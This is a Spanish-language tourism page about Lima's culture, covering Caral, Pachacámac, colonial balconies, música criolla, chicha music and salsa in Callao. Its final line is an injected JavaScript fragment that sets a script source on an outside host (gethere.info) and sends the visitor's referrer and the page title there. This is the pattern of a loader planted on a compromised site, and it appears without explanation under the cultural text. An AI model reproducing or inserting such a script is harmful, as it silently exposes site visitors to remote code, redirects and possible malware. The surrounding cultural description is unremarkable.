Image

QUICK CONTACT

[contact-form-7 id="2507" title="quick contact"]

CULTURA

Video Referencial

Lima fundada en 1535 por Francisco Pizarro y conocida como la “Ciudad de los Reyes”, Lima fue la ciudad más importante -entre las colonias hispanas en América- durante la época colonial, sin embargo, su historia se remonta a tiempos más remotos, es probable que aquí, muy cerca, se halla desarrollado las primeras civilizaciones en América como lo demuestra la  Ciudadela de Caral.

Ciudadela de Caral

caral

También podemos encontrar huacas de culturas preincas, vestigios arqueológicos prehispánicos como el Santuario de Pachacámac son testimonio de los antiguos peruanos que habitaron la zona. Museos de calidad que guardan una herencia cultural asombrosa. Desde lo mejor de las culturas prehispánicas hasta el arte contemporáneo, Lima tiene cultura a manos llenas.

Pachacamac

pachacamac

 

Lima tiene 480 años de historia. Durante todo este tiempo , nuestra ciudad ha vivido y contemplado diversos acontecimientos que la han ido cambiado, que le han permitido apropiarse de una personalidad única y distinta. Es muy característico encontrar en  Lima balcones que datan de épocas del Virreinato español en América.

cultuta

 

Desde la década de 1940, la ciudad experimentó un enorme crecimiento demográfico que trajo un consecuente crecimiento urbanístico que cambió para siempre el rostro de la ciudad. En ella convergen, producto de sucesivas migraciones, expresiones culturales de las distintas regiones del Perú. Es una urbe multicultural por excelencia, y como tal, ofrece al viajero un sinnúmero de experiencias por vivir.

El arte en sus múltiples expresiones se encuentra en toda la urbe, la música criolla instrumentada por el cajón peruano, guitarra en mano,  y quijada de burro es una melodía muy particular de Lima y de todo el Perú. La danza y el baile que se hacen presentes en múltiples celebraciones son de admirar por los visitantes.

CULTURA-VIVA

cultura

musica criolla

El término chicha tiene dos connotaciones dentro de la cultura peruana. La primera se refiere a la bebida fermentada hecha en base a maíz desde épocas preincaicas. La segunda se refiere al género musical que se originó a raíz de la migración de pobladores desde los andes a la costa, en especial Lima. La música chicha es el resultado de la fusión del huayno serrano con la cumbia colombiana y el son cubano.

Los afiches que se usan para promocionar los conciertos de música chicha o cumbia peruana se caracterizan por tener textos que abarcan casi todo el espacio del formato y colores fosforescentes que contrastan con la monotonía gris de la ciudad sobre todo en los suburbios de Lima.

1421029_565632596851070_2082355816_o

El Callao, culturalmente, ha sido el crisol donde se recibió una de las corrientes culturales más importantes del siglo XX. Su situación de puerto condicionó la introducción de la música Salsa directamente del Caribe. La  Salsa y todo lo que concierne a esta cultura en el Perú tiene que remitir necesariamente al Callao, en donde es el género más difundido y predominante, y define el carácter mismo de esta ciudad. Un personaje querido e hijo ilustre de la ciudad fue y todavía es Hector Lavoe el cual tiene un monumento a su memoria en pleno corazón del Callao.

hqdefault

 

 

 

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;